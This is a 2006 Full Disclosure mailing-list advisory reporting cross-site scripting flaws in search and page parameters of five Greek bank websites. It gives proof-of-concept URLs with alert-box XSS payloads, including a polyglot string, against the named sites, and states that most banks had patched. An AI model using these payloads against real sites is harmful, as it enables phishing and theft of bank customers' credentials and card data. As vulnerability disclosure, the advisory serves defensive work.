Full Disclosure mailing list archives
Cross Site Scripting at Several Greek Banks.
From: "Sentinel" <info () sentinel gr>
Date: Wed, 20 Sep 2006 09:59:15 +0300
Sentinel Computer Security Advisory Sentinel Co. http://www.sentinel.gr info () sentinel gr General Flaw Description : Cross Site Scripting Vulnerabilities in multiple Greek Web Banking sites. ------------------------------------------------------------------------------- Advisory Information ------------------------------------------------------------------------------- Advisory Release Date : 2006/09/01 Advisory ID : SGA-0002 Extends : None Deprecates : None ------------------------------------------------------------------------------- Product Information ------------------------------------------------------------------------------- Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx, http://www.winbank.gr/eCPage.asp, http://www.emporiki.gr/cbg/gr/search/search.jsp, http://www.piraeusbank.gr/ecportal.asp, http://www.probank.gr/search/index.php ------------------------------------------------------------------------------- Vulnerability Information ------------------------------------------------------------------------------- Flaw Type : Cross Site Scripting Vulnerability Impact : Phising and Scam attacks Vulnerability Rating : Critical Patch Status : Partially Patched Advisory Status : Verified Publicity Level : Published Other Advisories IDs : None Flaw Discovery Date : 2006/08/31 Patch Date : 2006/09/02 Vulnerability Credit : Emmanouil Gavriil (egavriil () sentinel gr) Exploit Status : Not Released Exploit Publication Date : None ------------------------------------------------------------------------------- Description ----------- Many Greek banks are using Web Banking service to assist their customers with their transactions. Eurobank, Winbank, Pireaus Bank, Probank and Emporiki Bank found to be vulnerable to Cross Site Scripting Attacks which can lead to execution of arbitrary SCRIPT and HTML code to the user. Technical Information --------------------- www.eurobank.gr is making use of multiple aspx files which fail to sanitise variables. Most of aspx files in Eurobank website which are getting variables as input are vulnerable to XSS. www.winbank.gr is using a search function which does not properly sanitise the input of variable text_search. www.emporiki.gr is using a jsp search function which does not properly sanitise the input of variable searchFld. www.piraeusbank.gr is having exactly the same problem with Winbank as it is actually the same bank. Even though it doesn't have a Web Banking System itself, it forwards Web Banking requests to winbank. Cross Site Scripting is possible, and thus the danger is the same, as an unsuspicious user can be lead from www.piraeusbank.gr with a valid redirection to a fake www.winbank.gr login screen. www.probank.gr doesn't have a Web Banking Service but the site is vulnerable to XSS and while account compromise is not possible, valuable information such as CARD and PIN numbers can be stolen through phising/scam attacks. Proof of Concept Experiment --------------------------- http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{} http://www.winbank.gr/eCPage.asp?Page=eCFullSearchResults.asp&lang=1&text_search=%3Cscript%3Ealert('XSS')%3C/script%3E http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{} http://www.piraeusbank.gr/ecportal.asp?id=235212&nt=107&pageno=1&fromsearch=234010&lang=2&tid=&txtSearch=%3Cscript%3Ealert('XSS')%3C/script%3E http://www.probank.gr/search/index.php?qu=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{} Patch Description and Information --------------------------------- Banks informed. All banks except Emporiki Bank have fixed the vulnerability. References and Other Resources for Information ---------------------------------------------- None. EOF.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Cross Site Scripting at Several Greek Banks. Sentinel (Sep 20)